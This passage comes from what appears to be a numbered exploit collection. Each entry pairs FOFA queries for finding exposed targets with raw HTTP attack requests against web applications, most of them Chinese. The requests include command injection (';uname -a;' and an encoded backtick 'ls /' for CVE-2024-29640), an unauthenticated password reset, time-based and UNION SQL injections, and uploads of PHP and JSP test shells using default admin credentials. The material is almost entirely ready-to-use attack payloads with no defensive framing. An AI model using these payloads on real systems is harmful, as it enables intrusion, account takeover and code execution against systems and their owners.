Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload interface file upload

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and access the file to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
